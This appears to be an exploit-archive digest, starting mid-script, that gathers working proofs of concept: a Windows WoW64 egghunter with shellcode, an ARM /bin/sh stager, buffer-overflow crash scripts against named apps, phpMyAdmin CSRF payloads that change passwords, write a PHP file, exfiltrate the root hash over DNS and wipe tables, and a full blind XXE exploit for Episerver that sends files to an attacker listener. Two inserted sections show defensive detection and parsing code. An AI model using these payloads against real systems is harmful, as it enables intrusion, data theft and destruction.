                ipv6_second_octet=str(ipv6_second_octet),
                ipv6_third_octet=str(ipv6_third_octet),
                ipv6_fourth_octet=str(ipv6_fourth_octet),
                port=str(port)))




        Windows/x64 (10) WoW64 Egghunter Shellcode


        50 bytes small Windows/x64 (10) WoW64 egghunter shellcode.


        MD5 | 2faba3b212b6eb54df90ce13b7ff49ff

        #include <Windows.h>
        #include <string.h>
        #include <stdio.h>
        #include <stdlib.h>
        using namespace std;

        /*

        Title: WoW64Egghunter for Windows 10 (32bit apps on 64bit Windows 10)
        Size: 50 bytes
        Date: 26/08/2018
        Author: n30m1nd - https://www.exploit-db.com/author/?a=8766
        Works in: 32 bit processes on a 64 bit Windows 10 OS
        How to: Compile under Visual Studio and run

        Credit where credit is due:
        - https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/
        - https://j00ru.vexillium.org/syscalls/nt/64/
        - https://www.exploit-db.com/exploits/41827/
        - https://web.archive.org/web/20101215052055/http://vx.netlux.org/lib/vrg02.html

        Shouts out to the Plakkers!

        // Assembly

        0: 8c cb mov ebx,cs
        2: 80 fb 23 cmp bl,0x23
        5: 33 d2 xor edx,edx
        7: 66 81 ca ff 0f or dx,0xfff
        c: 33 db xor ebx,ebx
        e: 42 inc edx
        f: 52 push edx
        10: 53 push ebx
        11: 53 push ebx
        12: 53 push ebx
        13: 6a 29 push 0x29
        15: 58 pop eax
        16: b3 c0 mov bl,0xc0 ; Heaven's gate
        18: 64 ff 13 call DWORD PTR fs:[ebx]
        1b: 83 c4 0c add esp,0xc
        1e: 5a pop edx
        1f: 3c 05 cmp al,0x5
        21: 74 e4 je 0x7
        23: b8 77 30 30 74 mov eax,0x74303077
        28: 89 d7 mov edi,edx
        2a: af scas eax,DWORD PTR es:[edi]
        2b: 75 e1 jne 0xe
        2d: af scas eax,DWORD PTR es:[edi]
        2e: 75 de jne 0xe
        30: ff e7 jmp edi
        */

        char n30m1ndhunter[] =
        "\x8C\xCB\x80\xFB\x23\x33\xD2\x66\x81\xCA\xFF\x0F"
        "\x33\xDB\x42\x52\x53\x53\x53\x6A\x29\x58\xB3\xC0"
        "\x64\xFF\x13\x83\xC4\x0C\x5A\x3C\x05\x74\xE4\xB8"
        "\x77\x30\x30\x74\x89\xD7\xAF\x75\xE1\xAF\x75\xDE"
        "\xFF\xE7";

        // msfvenom -p windows/exec cmd=calc.exe -f c
        char scode[] = "w00tw00t" // Eggu
        "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
        "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
        "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
        "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
        "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
        "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
        "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
        "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
        "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
        "\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
        "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
        "\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
        "\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

        int main(int argc, char **argv)
        {
        // Place the eggu (w00tw00t) in memory and make the shellcode executable
        void *eggfind = VirtualAlloc(0, sizeof scode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(eggfind, scode, sizeof scode);

        // Place the egghunter shellcode in memory and ...
        void *exec = VirtualAlloc(0, sizeof n30m1ndhunter, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        memcpy(exec, n30m1ndhunter, sizeof n30m1ndhunter);

        // ... jump to it
        ((void(*)())exec)();
        }



        Linux/ARM read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode


        28 bytes small Linux/ARM read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) shellcode.


        MD5 | 2d1869a5c35c547f56582874daf4ce46

        /*
        Title: Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode (28 Bytes)
        Date: 2018-08-30
        Tested: armv7l (Raspberry Pi 3 Model B+)
        Author: Ken Kitahara

        pi@raspberrypi:~ $ uname -a
        Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
        pi@raspberrypi:~ $ lsb_release -a
        No LSB modules are available.
        Distributor ID: Raspbian
        Description: Raspbian GNU/Linux 9.4 (stretch)
        Release: 9.4
        Codename: stretch
        pi@raspberrypi:~ $ cat binsh.s
        .section .text
        .global _start

        _start:
        .ARM
        add lr, pc, #1
        bx lr

        .THUMB
        // execve("/bin/sh", NULL, NULL)
        adr r0, spawn
        eor r1, r1, r1
        eor r2, r2, r2
        strb r2, [r0, #7]
        mov r7, #0xb
        svc #1

        spawn:
        .ascii "/bin/shX"
        pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
        pi@raspberrypi:~ $ ./binsh
        $ id
        uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
        $ exit
        pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
        pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x"""' binsh.bin && echo
        \x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
        pi@raspberrypi:~ $ cat stager.s
        .section .text
        .global _start

        _start:
        .ARM
        add lr, pc, #1
        bx lr

        .THUMB
        // load shellcode into stack region
        // read(0, buf, 0xff)
        eor r0, r0, r0
        mov r1, sp
        mov r2, #0xff
        mov r7, #3
        svc #1

        // change to ARM state
        eor r7, r7, r7
        mov lr, pc
        bx lr

        .ARM
        mov pc, r1
        pi@raspberrypi:~ $ as -o stager.o stager.s && ld -N -o stager stager.o
        pi@raspberrypi:~ $ (echo -en "\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58"; cat) | ./stager
        id
        uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
        exit
        ^C
        pi@raspberrypi:~ $ objcopy -O binary stager stager.bin
        pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x"""' stager.bin && echo
        \x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x40\x40\x69\x46\xff\x22\x03\x27\x01\xdf\x7f\x40\xfe\x46\x70\x47\x01\xf0\xa0\xe1
        pi@raspberrypi:~ $

        */

        #include<stdio.h>
        #include<string.h>

        unsigned char sc[] = \
        "\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
        "\x40\x40\x69\x46\xff\x22\x03\x27"
        "\x01\xdf\x7f\x40\xfe\x46\x70\x47"
        "\x01\xf0\xa0\xe1";

        int main(void)
        {
            printf("Shellcode Length: %zu\n", strlen((char *)sc));

            int (*ret)(void) = (int(*)(void))sc;

            ret();
            return 0;
        }


        NASA openVSP 3.16.1 Denial Of Service


        NASA openVSP version 3.16.1 suffers from a denial of service vulnerability.


        MD5 | 17a0e351fa6101e9f22929851204603d

        # Exploit Title: NASA openVSP 3.16.1 - Denial of Service (PoC)
        # Exploit Author : L0RD
        # Date: 2018-08-28
        # Vendor Homepage : https://software.nasa.gov/software/LAR-17491-1
        # Software link: https://github.com/nasa/OpenVSP
        # Version: 3.16.1
        # Tested on: Windows 10
        # CVE: N/A

        # Description :
        # The Vehicle Sketch Pad (VSP) is an aircraft geometry tool for rapid
        # evaluation of advanced design concepts.
        # for more information , check out this page :
        # https://software.nasa.gov/featuredsoftware/openvsp

        # Steps to reproduce:
        # 1) Run the python exploit code and open "poc.txt" file
        # 2) Copy the content of file
        # 3) Open "vsp.exe"
        # 4) Navigate to "Geom browser" and click on Add
        # 5) Then Navigate to "pod" and click on sub
        # 6) Click on "Add" and paste the content of "poc.txt" into the "name" field
        # 7) Click on add and Crash!

        #!/usr/bin/python

        buffer = "A" * 5000
        payload = buffer
        try:
            f = open("poc.txt", "w")
            print("[+] Creating %s bytes payload..." % len(payload))
            f.write(payload)
            f.close()
            print("[+] File created!")
        except IOError:
            print("File cannot be created")


        Immunity Debugger 1.85 Denial Of Service


        Immunity Debugger version 1.85 suffers from a denial of service vulnerability.


        MD5 | 5b0989449e6966d0e63bbda762c7da56

        # Exploit Title: Immunity Debugger 1.85 - Denial of Service (PoC)
        # Author: Gionathan "John" Reale
        # Date: 2018-08-28
        # Homepage: https://www.immunityinc.com/
        # Software Link: https://www.immunityinc.com/products/debugger/index.html
        # Tested Version: v1.85
        # Tested on OS: Windows 7 32-bit
        # Steps to Reproduce: Run the python exploit script, it will create a new
        # file with the name "exploit.exe.txt".Start the program. In the new window click "File">"Open".
        # Now change the "Files of type" to # "Any file" and select "exploit.exe.txt" .
        # Click "Open" and you will see a crash.

        #!/usr/bin/python

        buffer = "A" * 6000

        payload = buffer
        try:
            f = open("exploit.exe.txt", "w")
            print("[+] Creating %s bytes evil payload.." % len(payload))
            f.write(payload)
            f.close()
            print("[+] File created!")
        except IOError:
            print("File cannot be created")


        ipPulse 1.92 TCP Port Denial Of Service


        ipPulse version 1.92 suffers from a denial of service vulnerability.


        MD5 | 60d3d516e913c2359fae1b4e85d71931

        # Exploit Title: ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)
        # Discovery by: Diego Santamaria
        # Discovery Date: 2018-08-28
        # Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
        # Software Link: http://download.netscantools.com/ipls192.zip
        # Tested Version: 1.92
        # Vulnerability Type: Denial of Service (DoS) Local
        # Tested on OS: Windows 7 Professional

        # Steps to Reproduce:

        # 1. Run the python code TCP_port.py
        # 2. Open TCP_exploit.txt and copy the content
        # 3. Open ipPulse.exe
        # 4. Choose 'Target Editor'
        # 5. Write '1' in 'IP Address'
        # 6. Paste the content of TCP_exploit.txt into 'TCP Port'
        # 7. Press 'Add Above Fields to Target List'
        # 8. Press OK and the application crashes

        #!/usr/bin/env python

        content = "\x41" * 4087
        f = open ("TCP_exploit.txt", "w")
        f.write(content)
        f.close()


        Fathom 2.4 Denial Of Service


        Fathom version 2.4 suffers from a denial of service vulnerability.


        MD5 | 8b299a6b97d646d2f7063e90e22751e7

        # Exploit Title: Fathom 2.4 - Denial Of Service (PoC)
        # Author: Gionathan "John" Reale
        # Discovery Date: 2018-08-28
        # Homepage: https://fathom.concord.org/
        # Software Link: https://fathom.concord.org/download/
        # Tested Version: v2.4
        # Tested on OS: Windows 7 32-bit
        # Steps to Reproduce: Run the python exploit script; it will create a new
        # file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
        # Now start the program and paste the "exploit.txt" content copied earlier into the field named "Authorization Code".
        # Click "Activate" and see a crash!

        #!/usr/bin/python

        buffer = "A" * 6000

        payload = buffer
        try:
            f = open("exploit.txt", "w")
            print("[+] Creating %s bytes evil payload.." % len(payload))
            f.write(payload)
            f.close()
            print("[+] File created!")
        except IOError:
            print("File cannot be created")


        Skype Empresarial Office 365 16.0.10730.20053 Denial Of Service


        Skype Empresarial Office 365 version 16.0.10730.20053 suffers from a denial of service vulnerability.


        MD5 | 08b2503e8639def9d163c8243d5c4d17

        # Exploit Title: Skype Empresarial Office 365 16.0.10730.20053 - 'Dirección de inicio de sesión' Denial of Service (PoC)
        # Discovery by: Samuel Cruz
        # Discovery Date: 2018-08-29
        # Vendor Homepage: https://www.skype.com/es/business/
        # Tested Version: 16.0.10730.20053
        # Tested on OS: Windows 10 Pro x64 es/home/

        # Steps to produce the crash
        # 1.- Run the python code: python SkypeforBusiness_16.0.10730.20053.py
        # 2.- Open SkypeforBusiness.txt and copy its content to the clipboard
        # 3.- Open Skype for Business
        # 4.- Paste the clipboard into "Dirección de inicio de sesión" (sign-in address)
        # 5.- Click "Iniciar sesión" (sign in)
        # 6.- The application crashes

        buffer = "\x41" * 595
        f = open ("SkypeforBusiness.txt", "w")
        f.write(buffer)
        f.close()



        phpMyAdmin 4.7.x Cross Site Request Forgery


        phpMyAdmin version 4.7.x suffers from a cross site request forgery vulnerability.


        MD5 | bec670ecb667bf06900e5ba0197ad046

        # Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
        # Date: 2018-08-28
        # Exploit Author: VulnSpy
        # Vendor Homepage: https://www.phpmyadmin.net/
        # Software Link: https://www.phpmyadmin.net/downloads/
        # Version: Versions 4.7.x (prior to 4.7.7)
        # Tested on: php7 mysql5
        # CVE: CVE-2017-1000499

        # Exploit CSRF - Modifying the password of current user

        <p>Hello World</p>
        <img src="
        http://server/sql.php?db=mysql&table=user&sql_query=SET%20password
        %20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />

        # Exploit CSRF - Arbitrary File Write

        <p>Hello World</p>
        <img src="
        http://server/sql.php?db=mysql&table=user&sql_query=select
        '<?php phpinfo();?>' into outfile '/var/www/html/test.php';"
        style="display:none;" />

        # Exploit CSRF - Data Retrieval over DNS

        SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
        user='root' LIMIT 1),'.vulnspy.com\\test'));

        # Exploit CSRF - Empty All Rows From All Tables

        <p>Hello World</p>
        <img src="
        http://server/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"
        style="display:none;" />
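
A defender-side check for the request shape shown above, added here as an example and not part of the VulnSpy advisory or of phpMyAdmin's code: it scans constructed Apache combined-format access log lines for GET requests to sql.php or import.php that carry a sql_query parameter, URL-decodes the statement, and flags the ones whose Referer is not the phpMyAdmin host (assumed here to be the placeholder pma.example.test) or whose statement matches the high-impact primitives the advisory lists (SET PASSWORD, INTO OUTFILE, LOAD_FILE, generated DELETE FROM / CREATE PROCEDURE). A sql_query on a GET is on its own not proof of anything, since phpMyAdmin's own browse links carried one too, so the rule only fires when an indicator is present as well. The log lines and hostnames are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format access log lines (not from any real
# server): a normal page load, a password-change sql_query arriving from a
# foreign Referer, a SELECT ... INTO OUTFILE with no Referer at all, and an
# ordinary POST to import.php that carries no sql_query in the URL.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Aug/2018:10:00:01 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 5120 "http://pma.example.test/phpmyadmin/" "Mozilla/5.0"
10.0.0.5 - - [28/Aug/2018:10:00:07 +0000] "GET /phpmyadmin/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.vulnspy.com%27) HTTP/1.1" 200 2048 "http://attacker.example.test/page.html" "Mozilla/5.0"
10.0.0.5 - - [28/Aug/2018:10:00:09 +0000] "GET /phpmyadmin/sql.php?db=mysql&table=user&sql_query=select+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27+into+outfile+%27%2Fvar%2Fwww%2Fhtml%2Ftest.php%27%3B HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.5 - - [28/Aug/2018:10:00:15 +0000] "POST /phpmyadmin/import.php HTTP/1.1" 200 4096 "http://pma.example.test/phpmyadmin/server_sql.php" "Mozilla/5.0"
"""

# Hypothetical hostname of the phpMyAdmin instance; a real deployment would
# take this from its own configuration.
TRUSTED_HOST = "pma.example.test"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Statement shapes from the advisory that have no place in a URL a browser
# fetched on its own: credential change, file write, file read, and bulk
# deletion through a generated procedure.
RISKY_SQL = re.compile(
    r"\b(SET\s+password|INTO\s+OUTFILE|INTO\s+DUMPFILE|LOAD_FILE\s*\(|"
    r"CREATE\s+PROCEDURE|DELETE\s+FROM|DROP\s+)",
    re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does
    not match the combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return {'sql': ..., 'indicators': [...]} when the request has the
    CSRF-able shape (sql_query carried on a GET to sql.php or import.php)
    plus at least one indicator of cross-site origin or high impact;
    otherwise None."""
    url = urlsplit(entry["path"])
    if url.path.rsplit("/", 1)[-1] not in ("sql.php", "import.php"):
        return None
    params = parse_qs(url.query)
    if entry["method"] != "GET" or "sql_query" not in params:
        return None
    sql = params["sql_query"][0]
    indicators = []
    referer = entry["referer"]
    ref_host = urlsplit(referer).hostname if referer != "-" else None
    if ref_host != TRUSTED_HOST:
        # A hidden <img src=...> on another site produces exactly this:
        # a cross-origin Referer, or none when the browser suppresses it.
        indicators.append("Referer %r is not %s" % (referer, TRUSTED_HOST))
    m = RISKY_SQL.search(sql)
    if m:
        indicators.append("high-impact statement: %s" % m.group(1))
    return {"sql": sql, "indicators": indicators} if indicators else None


def scan(log_text):
    """Run classify() over every line and collect the flagged requests."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict:
            verdict.update(ts=entry["ts"], ip=entry["ip"])
            hits.append(verdict)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%s %s  %s" % (hit["ts"], hit["ip"], hit["sql"]))
        for reason in hit["indicators"]:
            print("    - " + reason)
```

Run against the four sample lines, the second and third are reported (foreign or absent Referer together with a credential change and a file write), while the normal page load and the POST to import.php pass. The same pattern works on the import.php payload at the end of the advisory, whose decoded sql_query contains both CREATE PROCEDURE and DELETE FROM.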



        Episerver 7 Patch 4 XML Injection


        Episerver version 7 patch 4 suffers from an XML external entity injection vulnerability.


        MD5 | ec159ea4ed255d29957e5ff1e1a1e131


        # Exploit Title: Episerver 7 patch 4 - XML External Entity Injection
        # Google Dork: N/A
        # Date: 2018-08-28
        # Exploit Author: Jonas Lejon
        # Vendor Homepage: https://www.episerver.se/
        # Version: Episerver 7 patch 4 and below
        # CVE : N/A

        ## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
        ## Starts a listening web server, so the exploit needs a public IP and an unfiltered port; configure RHOST below!
        ## Usage: ./episploit.py <target> [file-to-read]

        #!/usr/bin/python

        from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
        import urllib
        import re
        import sys
        import time
        import threading
        import socket

        SERVER_SOCKET = ('0.0.0.0', 8000)
        EXFIL_FILE = 'file:///c:/windows/win.ini'

        # The public facing IP. Change this
        RHOST = '1.2.3.4:' + str(SERVER_SOCKET[1])

        EXFILTRATED_EVENT = threading.Event()


        class BlindXXEServer(BaseHTTPRequestHandler):

            def response(self, **data):
                code = data.get('code', 200)
                content_type = data.get('content_type', 'text/plain')
                body = data.get('body', '')

                self.send_response(code)
                self.send_header('Content-Type', content_type)
                self.end_headers()
                self.wfile.write(body.encode('utf-8'))
                self.wfile.close()

            def do_GET(self):
                self.request_handler(self)

            def do_POST(self):
                self.request_handler(self)

            def log_message(self, format, *args):
                return

            def request_handler(self, request):
                global EXFILTRATED_EVENT

                path = urllib.unquote(request.path).decode('utf8')
                m = re.search(r'\/\?exfil=(.*)', path, re.MULTILINE)
                if m and request.command.lower() == 'get':
                    # Second stage: the target's parser followed the DTD and sent the file back
                    data = path[len('/?exfil='):]
                    print 'Exfiltrated %s:' % EXFIL_FILE
                    print '-' * 30
                    print urllib.unquote(data).decode('utf8')
                    print '-' * 30 + '\n'
                    self.response(body='true')

                    EXFILTRATED_EVENT.set()

                elif request.path.endswith('.dtd'):
                    # First stage: serve the DTD whose parameter entities build the callback URL
                    print 'Sending malicious DTD file.'
                    dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
        <!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s/?exfil=%%param_exfil;'>">
        %%param_request;''' % {'exfil_file': EXFIL_FILE, 'exfil_host': RHOST}

                    self.response(content_type='text/xml', body=dtd)

                else:
                    print '[INFO] %s %s' % (request.command, request.path)
                    self.response(body='false')


        def send_stage1(target):
            content = '''<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://''' + RHOST + '''/test.dtd"><foo>&exfil;</foo>'''
            payload = '''POST /util/xmlrpc/Handler.ashx?pageid=1023 HTTP/1.1
        Host: ''' + target + '''
        User-Agent: curl/7.54.0
        Accept: */*
        Content-Length: ''' + str(len(content)) + '''
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        ''' + content

            print "Sending payload.."
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            port = 80
            s.connect((target, port))
            s.send(payload)


        def main(target):
            server = HTTPServer(SERVER_SOCKET, BlindXXEServer)
            thread = threading.Thread(target=server.serve_forever)
            thread.daemon = True
            thread.start()
            send_stage1(target)

            # Block until the callback with the file content has arrived
            EXFILTRATED_EVENT.wait()


        if __name__ == '__main__':
            if len(sys.argv) > 1:
                target = sys.argv[1]
                if len(sys.argv) > 2:
                    EXFIL_FILE = sys.argv[2]
                main(target)
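
The receiving side of this exchange, written from the defender's seat as an added example (not Episerver's code and not part of the advisory): it feeds the same stage-1 document the script above sends to Python's expat parser with external parameter-entity processing switched off, so the remote DTD is never requested and the parameter entities that would build the callback URL never exist, and it records every DTD construct it sees so the attempt can be logged. It goes one step beyond the page by also handling the inline form of the attack, an <!ENTITY ... SYSTEM ...> declared in the internal subset, where the parser asks the application to resolve a file URL and the handler refuses. The three documents are constructed samples, and the policy in is_suspicious (reject anything DTD-related) is an assumption that fits an XML-RPC endpoint.

```python
import xml.parsers.expat as expat

# Constructed sample documents (not captured traffic). The first mirrors the
# stage-1 body sent by the script above; the second is the inline variant
# with the entity declared in the internal subset; the third is benign.
BLIND_XXE_DOC = ('<?xml version="1.0"?>'
                 '<!DOCTYPE foo SYSTEM "http://1.2.3.4:8000/test.dtd">'
                 '<foo>&exfil;</foo>')
INLINE_XXE_DOC = ('<?xml version="1.0"?>'
                  '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>'
                  '<foo>&xxe;</foo>')
BENIGN_DOC = ('<?xml version="1.0"?>'
              '<methodCall><methodName>ping</methodName></methodCall>')


def inspect_xml(doc):
    """Parse `doc` with every form of external resolution disabled and
    report the DTD-related constructs encountered.

    External parameter entities (the external DTD subset the blind payload
    points at) are never requested, and a reference to an external general
    entity is recorded and refused rather than resolved, so the parser
    performs no file or network access whatever the document asks for."""
    report = {
        "doctype": None,        # (name, system id) of the DOCTYPE, if present
        "entity_decls": [],     # (name, system id) of external <!ENTITY> declarations
        "external_refs": [],    # system ids the parser asked us to fetch (refused)
        "skipped": [],          # entity references left unresolved
        "well_formed": True,
    }
    p = expat.ParserCreate()
    # Never load the external subset: this alone defeats the blind stage.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def start_doctype(name, sysid, pubid, has_internal_subset):
        report["doctype"] = (name, sysid)

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if sysid is not None:
            report["entity_decls"].append((name, sysid))

    def external_ref(context, base, sysid, pubid):
        # Returning 1 tells expat the reference was dealt with; since we never
        # open `sysid`, nothing is read from disk or the network.
        report["external_refs"].append(sysid)
        return 1

    def skipped(name, is_param):
        # Fired for &exfil; because its declaration lives in a DTD we refused to load.
        report["skipped"].append(name)

    p.StartDoctypeDeclHandler = start_doctype
    p.EntityDeclHandler = entity_decl
    p.ExternalEntityRefHandler = external_ref
    p.SkippedEntityHandler = skipped
    try:
        p.Parse(doc, True)
    except expat.ExpatError:
        report["well_formed"] = False
    return report


def is_suspicious(report):
    """Policy (an assumption for this example): an XML-RPC endpoint has no
    legitimate use for a DTD, so any DOCTYPE, external entity declaration,
    refused fetch or unresolved entity reference rejects the request."""
    return bool(report["doctype"] or report["entity_decls"]
                or report["external_refs"] or report["skipped"])


if __name__ == "__main__":
    for label, doc in (("blind", BLIND_XXE_DOC), ("inline", INLINE_XXE_DOC),
                       ("benign", BENIGN_DOC)):
        r = inspect_xml(doc)
        print("%-6s %s %s" % (label, "REJECT" if is_suspicious(r) else "accept", r))
```

For the blind document the report carries the DOCTYPE's system id (the attacker-controlled DTD URL) and an unresolved entity named exfil, and no fetch was attempted; for the inline document it carries the declared entity and the refused file URL; the benign document produces an empty report. Logging the system ids from such reports is what turns the attempt into an alert with the callback host in it.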


        HD Tune Pro 5.70 Denial Of Service


        HD Tune Pro version 5.70 suffers from a denial of service vulnerability.


        MD5 | 58915d97eba3ab0861cc5797169d8056

        # Exploit Title: HD Tune Pro 5.70 - Denial Of Service (PoC)
        # Author: Gionathan "John" Reale
        # Discovery Date: 2018-08-29
        # Homepage: https://www.hdtune.com/
        # Software Link: https://www.hdtune.com/download.html
        # Tested Version: v5.70
        # Tested on OS: Windows 7 32-bit
        # Steps to Reproduce: Run the python exploit script; it will create a new
        # file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
        # Now start the program and click "File" > "Options.." > "Save". In the field named "Folder / file name" paste the "exploit.txt" content copied earlier.
        # Click "Apply" > "OK" and see a crash!

        #!/usr/bin/python

        buffer = "A" * 6000

        payload = buffer
        try:
            f = open("exploit.txt", "w")
            print("[+] Creating %s bytes evil payload.." % len(payload))
            f.write(payload)
            f.close()
            print("[+] File created!")
        except IOError:
            print("File cannot be created")


        Drive Power Manager 1.10 Denial Of Service


        Drive Power Manager version 1.10 suffers from a denial of service vulnerability.


        MD5 | c6cff6bb6ee54cb3dbdafc13abb27b20

        # Exploit Title: Drive Power Manager 1.10 - Denial Of Service (PoC)
        # Author: Gionathan "John" Reale
        # Discovery Date: 2018-08-29
        # Homepage: https://www.hdtune.com/
        # Software Link: https://www.hdtune.com/download.html
        # Tested Version: v1.10
        # Tested on OS: Windows 7 32-bit
        # Steps to Reproduce: Run the python exploit script; it will create a new
        # file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
        # Now start the program and paste the "exploit.txt" content copied earlier into the field named "Name".
        # Click "Register" and see a crash!

        #!/usr/bin/python

        buffer = "A" * 6000

        payload = buffer
        try:
            f = open("exploit.txt", "w")
            print("[+] Creating %s bytes evil payload.." % len(payload))
            f.write(payload)
            f.close()
            print("[+] File created!")
        except IOError:
            print("File cannot be created")


        Cisco AnyConnect Secure Mobility Client 4.6.01099 Denial Of Service


        Cisco AnyConnect Secure Mobility Client version 4.6.01099 suffers from a denial of service vulnerability.


        MD5 | 5ed808e3cadb933dedf1473553a3dc6e

        # Exploit Title: Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)
        # Discovery by: Luis Martinez
        # Discovery Date: 2018-08-29
        # Vendor Homepage: https://www.cisco.com/
        # Software Link: App Store for iOS devices
        # Tested Version: 4.6.01099
        # Vulnerability Type: Denial of Service (DoS) Local
        # Tested on OS: iPhone 7 iOS 11.4.1

        # Steps to Produce the Crash:
        # 1.- Run the python code: Cisco_AnyConnect_Secure_Mobility_Client_4.6.01099.py
        # 2.- Copy the output to the clipboard
        # 3.- Open the Cisco AnyConnect Secure Mobility Client app
        # 4.- Tap "Diagnosticos" (Diagnostics)
        # 5.- Tap "Certificados" (Certificates)
        # 6.- Tap "Importar certificado de usuario..." (Import user certificate...)
        # 7.- Paste the clipboard into "Introducir URL"
        # 8.- The app crashes

        #!/usr/bin/env python

        buffer = "\x41" * 12380000
        print (buffer)

